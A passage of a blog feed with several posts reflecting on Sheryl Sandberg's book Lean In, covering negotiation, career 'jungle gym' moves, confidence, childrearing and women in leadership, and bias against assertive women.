tag:blogger.com,1999:blog-35806867620801192842024-03-26T07:23:58.241-07:00trustedsignal -- blogdavehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.comBlogger84125tag:blogger.com,1999:blog-3580686762080119284.post-12240420406176020822024-03-22T12:49:00.000-07:002024-03-26T07:23:27.396-07:00Other thoughts from Lean In<p>My previous posts in this series have touched on the core issues that Sheryl Sandberg addresses in her book <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. If you're interested in these issues, I encourage you to read the book and read the criticism as well.</p><p>In this post I want to cover some of the other things I found valuable or interesting from the book. Even if you disagree with Sandberg's core thesis, she was a key leader at Google and Facebook. You may not like Google or Facebook, but it's undeniable that they are two of the most successful companies of all time. Sandberg's track record demonstrates that she's an effective leader. Here are some random insights not necessarily tied to the central theme of the book that influenced or that aligned with my experiences and thinking.</p><div style="text-align: left;"><br /></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_negotiation">On negotiation</a></div><div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_career_progression">On career progression -- it's a jungle gym, not a ladder</a></div></div><div><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_being_liked">On being liked v being effective</a></div><div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_evaluating">On evaluating and choosing opportunities</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_leadership">On leadership, power, and getting things done</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_communication" target="_blank">On communication, feedback, and performance</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#On_feminism" target="_blank">On feminism</a></div><div style="text-align: left;"><a href="https://trustedsignal.blogspot.com/2024/03/other-thoughts-from-lean-in.html#The_last" target="_blank">The last word</a></div><div style="text-align: left;"><br /></div><div style="text-align: left;"><a><br /></a></div><h3 style="text-align: left;"><a id="On_negotiation">On negotiation</a></h3></div><div>Sandberg tells us that "A study that looked at the starting salaries of students graduating with a master's degree from Carnegie Mellon University found that 57 percent of the male students, but only 7 percent of the female students, tried to negotiate for a higher offer." (Sandberg, 2013, p. 45) Is this another example of a lack of confidence or not wanting to come off as self-promoting? It may be. </div><p>I was deep into my own career before I ever bothered to negotiate for a higher salary. I had a co-worker tell me about his hiring process at our employer. He explained that he'd asked for $5K more than he was offered. I don't know what this represented in terms of his base pay, but I'm guessing it was around three percent. The company agreed to his request on the spot. A conversation lasting less than five minutes resulted in a three percent raise that paid out during all the years he worked for the company. If they'd said no, he would have accepted the original offer.</p><p>Sandberg tells us of her own experience negotiating with Mark Zuckerberg at Facebook, she tells Mark, "'Of course you realize that you're hiring me to run your deal teams, so you want me to be a good negotiator. This is the only time you and I will ever be on opposite sides of the table.' Then I negotiated hard." (Sandberg, 2013, p. 46)</p><p>I love her strategy. She's demonstrating the skills that Mark was hiring her for during the hiring process. Even if you're not going to run deal teams in a role you're interviewing for, you may be able to position your negotiation process in similar terms.</p><p><br /></p><h3 style="text-align: left;"><a id="On_career_progression">On career progression -- it's a jungle gym, not a ladder</a></h3><div><div><span style="font-family: inherit;">Another tale from the book that I enjoyed was about Lori Goler, a senior director of marketing at eBay who reached out to Sandberg saying </span></div><div></div><blockquote><div>"I want to apply to work with you at Facebook... So I thought about calling you and telling you all of the things I'm good at and all of the things I like to do. Then I figured that everyone was doing that. So instead, I want to ask you: What is your biggest problem, and how can I solve it?" (Sandberg, 2013, pp. 52-53)</div></blockquote><p><span style="font-family: inherit;">Sandberg tells us that her problem was recruiting and that Goler had no experience in recruiting, but agreed to a less senior position to learn those skills, "she was willing to trade seniority for acquiring new skills." (Sandberg, 2013, pp. 52-53)</span></p><p><span style="font-family: inherit;"></span></p><blockquote>"The most common metaphor for careers is a ladder, but this concept no longer applies to most workers. As of 2010, the average American had eleven jobs from the ages of eighteen to forty-six alone. This means that the days of joining an organization or corporation and staying there to climb that one ladder are long gone... Pattie Sellers, ... conceived a much better metaphor: 'Careers are a jungle gym, not a ladder." (Sandberg, 2013, p. 53)</blockquote><p></p><div style="text-align: left;"><span style="font-family: inherit;">People want to show ever increasing responsibility and titles that reflect that in their resumes, which is completely reasonable, but this is also a good way to "paint" oneself into a corner career-wise. There are benefits to lateral moves with different experiences. My own career has been a bit of a jungle gym. I've been in deep technical roles for most of my career, then moved to technical lead roles where I was doing technical work and directing others, but not really managing them, but it gave me some management exposure. I then moved back into a technical role with some sales engineering exposure where I got to do deep technical work that was also customer facing, then I moved into a technical manager role directing a team of people doing technical work with some sales engineering. After doing that for a few years, I went back into an individual contributor role doing deep technical work, and now I'm in a technical manager role.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">These experiences don't have titles showing consistent upward progress. Going from a senior director title to a principal engineering title was more of a jungle gym style lateral move than an up the ladder move, but I think I'm better for it. That move gave me a deeper understanding of the detection engineering space and a chance to get back into software development.</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">Consider the story above about Lori Goler who left her senior director role at eBay to work for Sandberg at Facebook in a role with a more junior title recruiting people. That move gave her an opportunity to learn an entirely new skillset. I see that today Goler is the Head of People at Meta. I'd say that jungle gym move paid off for her.</span></div></div><div><span style="font-family: inherit;"><br /></span></div><div><div><span style="font-family: inherit;">"Seeking out diverse experiences is useful preparation for leadership." (Sandberg, 2013, p. 62)</span></div></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;"><br /></span></div><h3 style="text-align: left;"><a id="On_being_liked">On being liked v being effective</a></h3><div><div>"Less than six months after I started at Facebook, Mark and I sat down for my first formal review. One of the things he told me was that my desire to be liked by everyone would hold me back... If you try to please everyone, you aren't making enough progress." (Sandber, 2013, p. 51)</div><div><br /></div><div>Great insight here from Zuckerberg. It reminds me of a section of Phil Fisher's book, <u>Common Stocks and Uncommon Profits</u> where Fisher talks about how to evaluate companies for investment. One of the things he looks at is the relationship between management and labor. He wants the relationship to be good obviously, but tells us that an "absence of conflict may not mean a basically happy relationship so much as fear or the consequences of conflict." (Fisher, 1958, p. 66)</div><div><br /></div><div>If you're universally loved, you may not be making enough progress.</div></div><div><br /></div><div><br /></div><h3 style="text-align: left;"><a id="On_evaluating">On evaluating and choosing opportunities</a></h3><div><div>When Sandberg was thinking of joining Google, she had a spreadsheet where she was tracking pros and cons. </div><div><blockquote>"Eric responded with perhaps the best piece of career advice that I have ever heard. He covered my spreadsheet with his hand and told me not to be an idiot (also a great piece of advice). The he explained that only one criterion mattered when picking a job -- fast growth. When companies grow quickly, there are more things to do than there are people to do them. When companies grow more slowly or stop growing, there is less to do and too many people to not be doing them. Politics and stagnation set in, and everyone falters... 'If you're offered a seat on a rocket ship, you don't ask what seat. You just get on.'" (Sandberg, 2013, p. 58)</blockquote></div></div><div><div>On joining Facebook as COO when other companies were offering to hire her as CEO: "As I did when I joined Google, I prioritized potential for fast growth and the mission of the company above title... I have seen both men and women miss out on great opportunities by focusing too much on career levels." (Sandberg, 2013, pp. 60-61)</div><div><br /></div><div>Consider this statement in light of the ladder v jungle gym discussion above.</div><div><br /></div><div>I'm currently working at my third startup. All of them have been very rewarding places to work, offering diverse opportunities for fast growth. I've had offers to join startups in their infancy, but at this point in life, with college tuitions and a mortgage, I'm too risk averse to be employee number three (maybe one day). As Sandberg says, "The cost of stability is often diminished opportunities for growth." (Sandberg, 2013, p. 61) The good news is that you can join startups at different points in their growth curves and get a good mix of growth and stability. You can even experience tremendous growth in large establish companies, if you find the right team and management.</div></div><div><br /></div><div><br /></div><h3 style="text-align: left;"><a id="On_leadership">On leadership, power, and getting things done</a></h3><div><span style="font-family: inherit;">"It is hard to visualize someone as a leader if she is always waiting to be told what to do." (Sandberg, 2013, p. 35)</span></div><div><span style="font-family: inherit;"><br /></span></div><div><span style="font-family: inherit;">I'm reminded of what Steve Jobs said, <span style="background-color: white; color: #181818;">“It doesn't make sense to hire smart people and then tell them what to do. We hire smart people so they can tell us what to do.” (<a href="https://www.goodreads.com/quotes/8586131-it-doesn-t-make-sense-to-hire-smart-people-and-then" target="_blank">Jobs, 2011</a>) When I hire people for roles on my team, one thing I'm always trying to gauge is their capacity for self-direction and the innovative ideas and execution that they will bring to the team.</span></span></div><div><br /></div><div>Sandberg quotes Alice Walker: "The most common way people give up their power is by thinking they don't have any." (Sandberg, 2013, p. 63) One of my favorite restaurants in my hometown has this on a poster on the wall. It's worth regular reflection.</div><div><br /></div><div><div>"Asking for input is not a sign of weakness but often the first step to finding a path forward." (Sandberg, 2013, p. 71)</div><div><br /></div></div><div><div>"... true leadership comes from individuality that is honestly and sometimes imperfectly expressed... leaders should strive for authenticity over perfection." (Sandberg, 2013, p. 91)</div><div><br /></div><div>Related, to the above, but not directly to leadership and power: "Another one of my favorite posters at Facebook declares in big red letters, 'Done is better than perfect.'" (Sandberg, 2013, p. 125)</div><div><br /></div><div><div>"Counterintuitively, long-term success at work often depends on not trying to meet every demand placed on us." (Sandberg, 2013, p. 126)</div><div><br /></div><div>"It is difficult to distinguish between the aspects of a job that are truly necessary and those that are not." (Sandberg, 2013, p. 130)</div><div><br /></div><div><span style="font-family: inherit;">These previous two quotes echo Jobs: </span></div><div><span style="font-family: inherit;"><span style="background-color: white; color: #181818;"></span></span></div></div></div><blockquote><div><div><div><span style="font-family: inherit;"><span style="background-color: white; color: #181818;">“People think focus means saying yes to the thing you've got to focus on. But that's not what it means at all. It means saying no to the hundred other good ideas that there are. You have to pick carefully. I'm actually as proud of the things we haven't done as the things I have done. Innovation is saying no to 1,000 things.” (</span><a href="https://www.goodreads.com/quotes/629613-people-think-focus-means-saying-yes-to-the-thing-you-ve" style="background-color: white;" target="_blank">Jobs, 2011</a><span style="background-color: white; color: #181818;">)</span></span></div></div></div><div></div></blockquote><div><div>On Facebook culture: "The company operated by moving quickly and tolerating mistakes..." (Sandberg, 2013, p. 74)</div><div><br /></div><div><br /></div><h3 style="text-align: left;"><a id="On_communication">On communication, feedback, and performance</a></h3><div>"Another way I try to foster authentic communication is to speak openly about my own weaknesses." (Sandberg, 2013, p. 85)</div></div><div><div><div><br /></div><div>Always own your mistakes openly, especially when you're a leader. It sets the right example, shows others that mistakes are part of the process of failing forward.</div><div><br /></div><div>Think what you will about Mark Zuckerberg. I love this story from Sandberg's book:</div><div><blockquote>"When people are open and honest, thanking them publicly encourages them to continue while sending a powerful signal to others," which she follows with this powerful example, "At a summer barbecue four years ago, an intern told Mark that he should work on his public speaking skills. Mark thanked him in front of everyone and then encouraged us to extend him a full-time job offer." (Sandberg, 2013, p. 86)</blockquote></div><div>Zuckerberg could have gone a very different direction with that feedback, but he had the presence of mind to consider that the feedback was warranted and recognized that the intern had the courage to speak his mind.</div><div><br /></div></div><div>"... being open to the truth means taking responsibility for mistakes." (Sandberg, 2013, p. 84)</div></div><div></div><blockquote><div>"Authentic communication is not always easy, but it is the basis for successful relationships at home and real effectiveness at work. Yet people constantly back away from honesty to protect themselves and others. This reticence causes and perpetuates all kinds of problems: uncomfortable issues that never get addressed, resentment that builds, unfit managers who get promoted rather than fired, and on and on." (Sandberg, 2013, pp. 77-78)</div><div></div></blockquote><div>"... someone's performance is assessed by someone else's perception." (Sandberg, 2013, p. 78)</div><div><br /></div><div><div>"It is nearly impossible to know how our actions are perceived by others. We can try to guess what they're thinking, but asking directly is far more effective." (Sandberg, 2013, p. 81)</div></div><div><div></div><blockquote><div>"One thing that helps is to remember that feedback, like truth, is not absolute. Feedback is an opinion, grounded in observations and experiences, which allows us to know what impression we make on others. The information is revealing and potentially uncomfortable, which is why all of us would rather offer feedback to those who welcome it." (Sandberg, 2013, p. 83)</div><div></div></blockquote><div>"Truth is better served by using simple language." (Sandberg, 2013, p. 79)</div></div><div><br /></div><div>"When communicating hard truths, less is often more." (Sandberg, 2013, p. 80)</div><div><br /></div><div>"restating the other person's point before responding to it." (Sandberg, 2013, p. 80)</div><div><br /></div><div>"relecting someone's viewpoint clarifies the disagreement and becomes a starting point for resolution. We all want to be heard, and when we focus on showing others that we are listening, we actually become better listeners." (Sandberg, 2013, p. 81)</div><div><br /></div><div>"... people rarely seek enough input." (Sandberg, 2013, p. 81)</div><div><br /></div><div>Sandberg tells the story of her first week working for Robert Rubin, secretary of the Treasury, she was invited to a meeting about restructuring the IRS. Being new and not knowing much about the subject, she did not take a seat at the conference room table, </div><div></div><blockquote><div>"Toward the end of the meeting, Secretary Rubin suddenly turned and asked, 'Sheryl, what do you think?' I was stunned silent -- my mouth opened but nothing came out. When he saw how shocked I was, Secretary Rubin explained why he had put me on the spot: 'Because you're new and not fully up to speed on how we do things, I thought you might see something we were missing... Rubin sent a powerful message... about the value of soliciting ideas from every corner..." (Sandberg, 2013, p. 82)</div><div></div></blockquote><div>Whenever someone new joins my team, I try to emphasize that they should ask questions <b>and offer suggestions</b> precisely because they are new. Their fresh perspective may help us see things that we've been overlooking.</div><div><br /></div><div>"... the traditional practice of judging employees by face time rather than results unfortunately persists. Because of this, many employees focus on hours clocked in the office rather than on achieving their goals as effectively as possible." (Sandberg, 2013, p. 130)</div><div><br /></div><div>Quoting General Colin Powell: "... I am paying them for the quality of their work, not for the hours they work." (Sandberg, 2013, p. 131)</div><div><br /></div><div>"Instead of perfection, we should aim for sustainable and fulfilling." (Sandberg, 2013, pp. 138-139)</div><div><br /></div><div><a><br /></a></div><h3 style="text-align: left;"><a id="On_feminism">On feminism</a></h3><div>"A feminist is someone who believes in social, political, and economic equality of the sexes." (Sandberg, 2013, p. 158)</div><div><br /></div><div>That's how I've always defined it too and that's pretty close to the dictionary definition. Hard to see how any rational person could not be a feminist.</div><div><br /></div><div><a><br /></a></div><h3 style="text-align: left;"><a id="The_last">The last word</a></h3><div>"We should expect professional behavior, and even kindness, from everyone." (Sandberg, 2013, p. 165)</div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-5744026223013872652024-03-14T19:53:00.000-07:002024-03-14T19:53:27.919-07:00Overcoming our "bossypants" bias<p>This is the fifth post in a series of posts inspired by reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. </p><p><a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem-two.html" target="_blank">We've previously looked at some of Sandberg's evidence</a> </p><p></p><ul style="text-align: left;"><li>That women are underrepresented in positions of power and leadership</li><li>How lack of confidence contributes to the issue</li><li>How decisions about having children play a role in the problem</li></ul><div>If you've read the posts in this series you may be thinking Sandberg is blaming the victim. Indeed some critics make that claim, but I don't think a sincere reading of the book leads to that conclusion. The problem goes deeper. It's cultural.</div><div><br /></div><div>When a male leader is assertive, decisive, and direct, people may see him as strong leader. When a female exhibits these same qualities, people think she's bossy. In <u>Lean In</u> Sandberg quotes Deborha Gruenfeld, a professor of leadership and organizational behavior at Stanford as saying,</div><div></div><blockquote><div>"Our entrenched cultural ideas associate men with leadership qualities and women with nurturing qualities and put women in a double bind... We believe not only that women are nurturing, but that they should be nurturing above all else. When a woman does anything that signals she might not be nice first and foremost, it creates a negative impression and makes us uncomfortable." (Sandberg, 2013, p. 43)</div></blockquote><p>Echoes of this are present throughout our culture. I found it in Maria Konnikova's book <u>The Biggest Bluff: How I Learned to Pay Attention, Master Myself, and Win,</u> in which Konnikova documents dedicating a year to learning the popular poker game of Texas Hold 'em and competes in the World Series of Poker. Her coach is advising her to play more aggressively. She's struggles with this advice saying,</p><div style="text-align: left;"><span style="font-family: inherit;"></span><blockquote><span style="font-family: inherit;">"It comes to me then, the thing that's been nagging at me, and I don't at all like the realization: a lot of my failure to up the aggression factor is due to my social conditioning. Over the years, I've learned that it doesn't pay to be aggressive while female. It's unattractive to those in power namely men, but also some of those women who have managed to make it to the top and now don't want to jeopardize their position." (Konnikova, 2020, p. 101)</span></blockquote></div><div>More succinctly, "... success and likeability are negatively correlated for women." (Sandberg, 2013, p. 153)</div><p>We need to overcome this cultural resistance and celebrate good leadership qualities regardless of whether they come from men, women or non-binary individuals. Good leaders should be recognized as good leaders regardless of biological sex or gender.</p><div>If women in leadership roles were common this bias against female leaders may fade. As Sandberg says, "Real change will come when powerful women are less of an exception." (Sandberg, 2013, p. 50)</div><div><br /></div><div><div>Recognizing that we may have implicit biases against female leadership and talking about how to overcome it may help improve things -- "The simple act of talking openly about behavioral patterns makes the subconscious conscious." (Sandberg, 2013, p. 148)</div><div><br /></div><div>One story Sandberg recounts further underpins the cultural bias:</div><div><blockquote>"Jocelyn Goldfein, one of the engineering directors at Facebook, held a meeting with our female engineers where she encouraged them to share the progress they had made on the products they were building. Silence. No one wanted to toot her own horn. Who would want to speak up when <b>self-promoting women are disliked</b>?" (Sandberg, 2013, p. 44)</blockquote><p>In general, I think most self-promoters are disliked regardless of gender, but consider the situation, an engineering director encouraging female engineers to "share the progress on the products they were building." Speaking up in this context hardly seems like self-promotion, but I'm a male, and the fact that I see it this way may be more evidence of the problem.</p><p>What follows regarding this situation is interesting, "Jocelyn switched her approach. Instead of asking the women to talk about themselves, she asked them to tell one another's stories. The exercise became communal, which put everyone at ease." (Sandberg, 2013, p. 44)</p><p>As an engineering leader, I am interested in this communal approach because as Sandberg tells us and my own experience has shown, "... well-functioning groups are stronger than individuals." (Sandberg, 2013, p. 48)</p></div></div><div>Reading <u>Lean In</u> gives one the sense that a vicious cycle is at work. Cultural biases against strong females and a desire to be liked, dampen women's desire to speak up and may prevent them from seeking leadership positions. The resulting lack of representative female leadership perpetuates the cultural bias that leadership roles aren't for women and reinforces the stereotype that women should be nice and nurturing rather than strong and assertive. The cultural pressure to be nurturing may reinforce women's thinking about childrearing, causing them to leave the workforce and too often to leave before leaving again reducing the number of women in the workforce and in positions of leadership.</div><div><br /></div><div>In the book Sandberg speaks about mentorship as a possible means of improving things. Here again the vicious cycle is reinforced. Because there are more men in positions of leadership and fewer women in the workforce, male leaders typically choose to mentor junior men in their organizations simply because there are more of them.</div><div><br /></div><div><div>"Mentorship and sponsorship are crucial for career progression. Both men and women with sponsors are more likely to ask for stretch assignments and pay raises than their peers of the same gender without sponsors." (Sandberg, 2013, p. 66)</div><div><br /></div><div><div>If there were more women in leadership positions, more junior women in organizations may find good mentors. </div><div><br /></div></div><div>In the first post in this series, I quoted Sandberg quoting Kunal Modi. Recall that Modi said, "for the sake of American corporate performance and shareholder returns, men must play an active role in ensuring that the most talented young workers (often women...) are being encouraged to advocate for their career advancement..." (Sandberg, 2013, pp. 165-166)</div><div><br /></div><div>"Men of all ages must commit to changing the leadership ratios. They can start by <b>actively seeking out qualified female candidates</b> to hire and promote. And if qualified candidates cannot be found, then we need to invest in more recruiting, mentoring, and sponsoring so women can get the necessary experience." (Sandber, 2013, p. 166)</div><div><br /></div><div>On the above point of being unable to find qualified candidates and the call to invest more in recruiting, mentoring, and sponsoring female candidates, I'd be curious to hear from the economists. Is this an effective use of a company's resources? Does it make more financial sense to just hire from the available supply of talent? I believe there's value in a diverse team, but how is that effectively measured? How much additional time and effort should a profit driven company spend recruiting? What is the return on that investment? There are anecdotes online and references to studies showing that women led companies outperform male led companies. (<a href="https://www.apa.org/topics/women-girls/female-leaders-make-work-better#:~:text=Decades%20of%20studies%20show%20women,companies%20are%20led%20by%20women." target="_blank">Novotney, 2023</a>)</div><div><br /></div><div><div>If we're unable to spend extra effort to recruit qualified females, it's a no brainer that we should encourage our best contributors to advocate for themselves, to strive for more responsibility, to speak up, and to lean in. Being a manager and a mentor aren't the same thing. Encourage members of your team to find mentors. Help them find one, if they want, and be a mentor to someone outside your team or organization.</div></div><div><br /></div><div>As Modi said our motivations don't need to be altruistic because more female leadership doesn't just "lead to fairer treatment for all women." Sandberg tells us that "Research already suggests that companies with more women in leadership roles have better work-life policies, smaller gender gaps in executive compensation, and more women in midlevel management." (Sandberg, 2013, p. 171)</div></div><div><br /></div><div><div>"More female leadership will lead to fairer treatment for all women." (Sandberg, 2013, p. 171) </div></div><div><br /></div><div>I hope that one day female leadership is so common we don't really notice it anymore. As Sandberg says,</div><div><div>"In the future, there will be no female leaders. There will just be leaders." (Sandberg, 2013, p. 172)</div><div><br /></div><div>If you're a man in a traditional (i.e. heteronormative) relationship, you can help in simple ways. "... when asked at a conference what men could do to help advance women's leadership, Harvard Business School professor Rosabeth Moss Kanter answered, 'The laundry.'" (Sandberg, 2013, p. 110)</div><div><br /></div><div>I've been talking to my wife about <u>Lean In</u> and many of the topics discussed in this series of posts. We were talking about doing chores around the house the other day and she was telling me about some videos she'd seen online of women talking about their husbands doing things around the house like vacuuming, cleaning bathrooms, etc. and telling their wives that they were trying to "help out." These women were glad for the efforts, but annoyed at the reasoning. Don't do things around your own home to "help out," do them because you're an adult living in the environment and the tasks need doing. When you say you're doing it to "help out," you're implying that it's not actually your responsibility.</div><div><br /></div><div><u>Lean In</u> has more to say on these topics than I've covered in this series of posts. Writing these posts has helped me think more deeply about these issues. If you've read or skimmed these posts, I hope they have given you something to think about. In that vein, this time I'm going to leave you with Aretha Franklin's "Think."</div></div><div><br /></div><div>Next post, I'm going to share some of the insights from <u>Lean In</u> that I thought were interesting or thought provoking and not necessarily relevant to the central theme of the book, but things that gave me a new perspective, helped me clarify my thinking, challenged me in some way, or that I identified with.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/Vet6AHmq3_s" width="320" youtube-src-id="Vet6AHmq3_s"></iframe></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-56155538976693580012024-03-08T13:04:00.000-08:002024-03-08T13:06:22.079-08:00What's the cause of the problem part two<p>This is the fourth post in a series of posts inspired by reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. </p><p><a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem.html" target="_blank">Previously</a> we discussed lack of confidence as one of the causes that Sandberg cites for the lack of women in leadership roles. Another reason she gives is pregnancy and childrearing. It's not just that women leave the workforce when they give birth, it's also that they factor pregnancy and childrearing into decisions about whether or not to take on bigger roles and more responsibilities -- "they leave before they leave," Sandberg says. (Sandberg, 2013, p. 93)</p><p>Sandberg encourages women to take the opposite approach. If they are interested in achieving more, she encourages them to pursue bigger roles and more responsibility. "The months and years leading up to having children are not the time to lean back, but the critical time to lean in." (Sandberg, 2013, p. 95)</p><div><div>According to Sandberg, "forty-three percent of highly qualified women with children are leaving careers, or 'off-ramping' for a period of time." (Sandberg, 2013, p. 98)</div><div><br /></div><div>What's more, "only 74 percent of professional women will rejoin the workforce in any capacity, and only 40 percent will return to full-time jobs..." (Sandberg, 2013, p. 102)</div><div><br /></div><div>That's a significant percentage of "highly qualified" individuals leaving the workforce. This loss of good people impacts the companies and organizations where they work, but it has an even greater impact on the lifetime earnings of those women. Obviously those who never return face the greatest impact to their earnings, but even for those who return, "controlling for education and hours worked, women's average annual earnings decrease by 20 percent if they are out of the workforce for just one year. Average annual earnings decline by 30 percent after two to three years." (Sandberg, 2013, p. 102) Factor in compounding over a lifetime and the financial impacts are highly consequential.</div><div><br /></div></div><div>I mentioned previously that I'm the father of daughters. My wife and I did the "back of the envelope" math and calculated that having her quit her job to stay home with our children was more cost effective than having her work and paying for full-time childcare. Except we didn't factor in the loss of future earnings. In fact, I was never even aware of this oversight until I read "... professional women need to measure the cost of child care against their future salary rather than their current salary." (Sandberg, 2013, p. 102)</div><div><br /></div><div>I love this insight by Sandberg. Impact on future earnings is just the kind of thing an excellent business leader would factor in when making a decision to leave the workforce, even if temporarily, for an extended amount of time following childbirth.</div><div><br /></div><div>We believe there are benefits to having a parent deeply involved in the day-to-day childrearing, but Sandberg provides evidence that children raised by multiple caregivers fair just as well as those where their mother is the primary caregiver.</div><div><div></div><blockquote><div>"In 2006, the researchers released a report summarizing their findings, which concluded that 'children who were cared for exclusively by their mothers did not develop differently than those who were also cared for by others.' They found no gap in cognitive skills, language competence, social competence, ability to build and maintain relationships or in the quality of the mother-child bond." (Sandberg, 2013, pp. 135-136)</div></blockquote><div>Further, "Some data even suggest that having two parents working outside the home can be advantageous to a child's development, particularly for girls." (Sanders, 2013, p. 136) And Sandberg tells us, "We all need to encourage men to lean in to their families." (Sandberg, 2013, p. 113) after all, </div></div><div><blockquote><div>"children with involved and loving fathers have higher levels of psychological well-being and better cognitive abilities. When fathers provide even just routine child care, children have higher levels of educational and economic achievement and lower delinquency rates. Their children even tend to be more empathetic and socially competent. These findings hold true for children from all socioeconomic backgrounds, whether or not the mother is highly involved." (Sandberg, 2013, p. 113)</div></blockquote><p>Ultimately it should be up to each individual to decide if they want to leave the workforce to raise children or if they want to go after that next promotion (or both), but individuals should be informed about the financial implications of those decisions and the equation isn't just about the present day cost of childcare.</p><div style="text-align: left;"><span style="background-color: white; font-family: inherit;"><span jsname="YS01Ge">Now I'll leave you with some related words from Beyoncé from her song Flawless, enjoy the video.<br /></span><blockquote><span jsname="YS01Ge">I took some time to live my life<br /></span><span jsname="YS01Ge">But don't think I'm just his little wife<br /></span><span jsname="YS01Ge">Don't get it twisted, get it twisted<br /></span><span jsname="YS01Ge">This my shit, bow down, bitches</span></blockquote><span jsname="YS01Ge"></span></span></div><p></p><div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/IyuUWOnS9BY" width="320" youtube-src-id="IyuUWOnS9BY"></iframe></div></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-49353201291135010742024-03-03T16:52:00.000-08:002024-03-08T13:06:48.438-08:00What's the Cause of the Problem?<p>This is the third post in a series of posts inspired by reading Sheryl Sandberg's book, <a href="https://www.alibris.com/Lean-in-Women-Work-and-the-Will-to-Lead-Sheryl-Sandberg/book/28224373?matches=778">Lean In: Women, Work, and the Will to Lead</a>. In the <a href="https://trustedsignal.blogspot.com/2024/02/the-problem-is-people-but-which-people.html" target="_blank">previous post</a>, I shared some of the statistics from Sandberg's book and other sources that show that women are underrepresented in leadership and technical roles. Even in fields where women dominate leadership positions, like human resources roles, they are underpaid compared to their male counterparts.</p><p>In this post, I'll share some notes from the book that may explain why this disparity persists.</p><h4 style="text-align: left;">Is it a confidence game?</h4><div>One of the reasons Sandberg cites for women being underrepresented may be tied to a lack of confidence, or perhaps a surplus of confidence from their male counterparts.</div><div><br /></div><div style="text-align: left;"><span style="font-family: inherit;"><span style="font-weight: normal;">"An internal report at Hewlett-Packard revealed that women only apply for open jobs if they think they meet 100 percent of the criteria listed. Men apply if they think they meet 60 percent of the requirements. This difference has a huge ripple effect. Women need to shift from thinking 'I'm not ready to do that' to thinking 'I want to do that -- and I'll learn by doing it.'" <span style="font-family: inherit;">(</span></span></span><span style="font-weight: normal;"><span style="font-family: inherit;">Sandberg, 2013, p. 62)</span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;">Sandberg goes on to share an anecdote from Cisco's then chief technology officer, Padmasree Warrior. The Huffington Post asked her, "What's the most important lesson you've learned from a mistake you've made in the past?" (Sandberg, 2013, p. 35)</span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;">Warrior responds, </span></span></div><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;"></span></span></div><blockquote><div style="text-align: left;"><span style="font-weight: normal;"><span style="font-family: inherit;">"</span></span>I said no to a lot of opportunities when I was just starting out because I thought, 'That's not what my degree is in' or 'I don't know about that domain.' In retrospect, at a certain point it's your ability to learn quickly and contribute quickly that matters. One of the things I tell people these days is that there is no perfect fit when you're looking for the next big thing to do. You have to take opportunities and make an opportunity fit for you, rather than the other way around. The ability to learn is the most important quality a leader can have." (Sandberg, 2013, p. 35)</div></blockquote><div style="text-align: left;">Sandberg elaborates on the confidence issue, "self-doubt becomes a form of self-defense... We put ourselves down before others can." (Sandberg, 2013, p. 41)</div><div style="text-align: left;"><div><br /></div><div>I've been told throughout my career that I'm self-effacing, overly modest and too self-critical. I never recognized until reading these words that it could be a form of self-defense. Like Warrior, I've also held myself back from applying for roles I was interested in because I didn't think I was a perfect fit.</div><div><br /></div><div>We do ourselves a disservice when we sell ourselves short and hold ourselves back due to a lack of confidence, thinking we can't learn some new thing quickly enough. I'm reminded of attending interview training when I worked at Microsoft. Confidence was one of the things that we were asked to assess as data supports to the idea that confidence is a predictor of employee effectiveness.</div><div><br /></div><div>Confidence isn't fixed, fortunately. We can improve our self-efficacy through new achievements. The old saying that "Success breeds success," is true. As managers, we can help by encouraging our teams; reminding them that we believe in them; giving them more responsibility and increasingly challenging tasks; being there when they need help, and when the fail at something, helping them reflect on, <b>learn from the failure, and move on. Too much focus on failures undermines confidence</b>.</div><div><br /></div><div>Self-doubt holds us all back, and Sandberg points to data indicating this is a bigger problem for women than for men, hence it contributes to the disparity in female representation in leadership and technical roles. <span style="font-family: inherit;">In the next post in this series, I'll <a href="https://trustedsignal.blogspot.com/2024/03/whats-cause-of-problem-two.html" 